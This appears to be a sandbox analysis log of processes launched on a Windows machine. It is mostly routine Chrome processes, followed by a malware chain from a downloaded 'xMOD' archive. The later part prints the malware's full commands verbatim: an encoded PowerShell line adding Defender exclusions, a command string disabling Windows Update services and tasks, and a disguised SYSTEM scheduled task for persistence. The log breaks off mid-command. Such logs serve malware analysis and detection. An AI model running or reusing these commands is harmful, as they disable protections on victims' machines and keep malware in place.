"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6580 /prefetch:8
2⤵
PID:5016

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6660 /prefetch:8
2⤵
PID:5088

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6920 /prefetch:8
2⤵
PID:952

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5352 /prefetch:8
2⤵
PID:1960

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6572 /prefetch:8
2⤵
PID:4688

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6608 /prefetch:1
2⤵
PID:4980

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6992 /prefetch:1
2⤵
PID:3872

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6540 /prefetch:1
2⤵
PID:4636

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6940 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4916

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5300 /prefetch:1
2⤵
PID:3276

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7280 /prefetch:1
2⤵
PID:4408

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7128 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:5240

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6792 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:5248

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4828 /prefetch:1
2⤵
PID:5324

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6828 /prefetch:1
2⤵
PID:5384

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2540 /prefetch:8
2⤵
PID:5456

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7288 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:5492

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1572 /prefetch:1
2⤵
PID:5552

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2584 /prefetch:1
2⤵
PID:5568

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6988 /prefetch:1
2⤵
PID:5672

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7048 /prefetch:1
2⤵
PID:5680

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7744 /prefetch:1
2⤵
PID:5724

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2752 /prefetch:1
2⤵
PID:5740

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2560 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:6132

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3772 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2792

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2864 /prefetch:8
2⤵
PID:4720

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4740 /prefetch:1
2⤵
PID:5500

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7760 /prefetch:1
2⤵
PID:5512

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2560 /prefetch:1
2⤵
PID:5536

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2772 /prefetch:1
2⤵
PID:5424

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6936 /prefetch:1
2⤵
PID:5404

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6568 /prefetch:1
2⤵
PID:5372

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7736 /prefetch:1
2⤵
PID:5380

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1576 /prefetch:1
2⤵
PID:5344

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8396 /prefetch:1
2⤵
PID:5808

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2140 /prefetch:8
2⤵
PID:4920

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2696 /prefetch:8
2⤵
PID:2008

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1612 /prefetch:1
2⤵
PID:1148

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4500 /prefetch:1
2⤵
PID:3840

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4332 /prefetch:1
2⤵
PID:1992

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7204 /prefetch:1
2⤵
PID:5572

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2892 /prefetch:8
2⤵
PID:5960

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1632,15409912478197374272,13093894540815559588,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=6700 /prefetch:2
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:5476

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:964

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:6028

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\xMOD v4.7 (PASS 123).rar"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:6112

C:\Users\Admin\AppData\Local\Temp\7zO0E7DCB17\Loader.exe
"C:\Users\Admin\AppData\Local\Temp\7zO0E7DCB17\Loader.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1928

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5264

C:\Users\Admin\AppData\Local\Temp\WindowsDefender.exe
"C:\Users\Admin\AppData\Local\Temp\WindowsDefender.exe"
4⤵
- Executes dropped EXE
PID:6000

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\WindowsDefender.exe"
5⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:632

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGwAdwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHAAeAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBwAGkAcQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB2AHUAIwA+AA=="
6⤵
PID:5500

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAGwAdwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHAAeAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBwAGkAcQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB2AHUAIwA+AA=="
7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5492

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
6⤵
PID:5892

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
7⤵
PID:5200

C:\Windows\system32\sc.exe
sc stop bits
7⤵
PID:5944

C:\Windows\system32\sc.exe
sc stop dosvc
7⤵
PID:5956

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
7⤵
- Modifies registry key
PID:6108

C:\Windows\system32\sc.exe
sc stop wuauserv
7⤵
PID:5124

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
7⤵
- Modifies registry key
PID:5900

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
7⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1876

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
7⤵
- Modifies registry key
PID:5084

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
7⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:8

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
7⤵
- Modifies registry key
PID:5952

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
7⤵
- Modifies security service
- Modifies registry key
PID:5060

C:\Windows\system32\sc.exe
sc stop UsoSvc
7⤵
PID:5000

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
7⤵
- Modifies registry key
PID:5320

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
7⤵
- Modifies registry key
PID:3780

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
7⤵
- Modifies registry key
PID:5228

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
7⤵
- Modifies registry key
PID:3992

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
7⤵
PID:2892

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
7⤵
PID:2268

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
7⤵
PID:2180

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
7⤵
PID:4412

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
7⤵
PID:4288

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
7⤵
PID:3684

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
7⤵
PID:852

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Program Files\Windows\services.exe"
6⤵
PID:5924

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Program Files\Windows\services.exe"
7⤵
- Creates scheduled task(s)
PID:2040

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
6⤵
PID:4152

C:\Windows\system32\schtasks.exe
schtasks /run /tn "GoogleUpdateTaskMachineQC"
7⤵
PID:392

C:\Program Files\Windows\services.exe
"C:\Program Files\Windows\services.exe"
1⤵
- Executes dropped EXE
PID:2568

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Program Files\Windows\services.exe"
2⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3952

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGwAdwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHAAeAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBwAGkAcQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB2AHUAIwA+AA=="
3⤵
PID:1492

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAGwAdwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHAAeAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBwAGkAcQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB2AHUAIwA+AA=="
4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5968

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
3⤵
PID:5116

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN 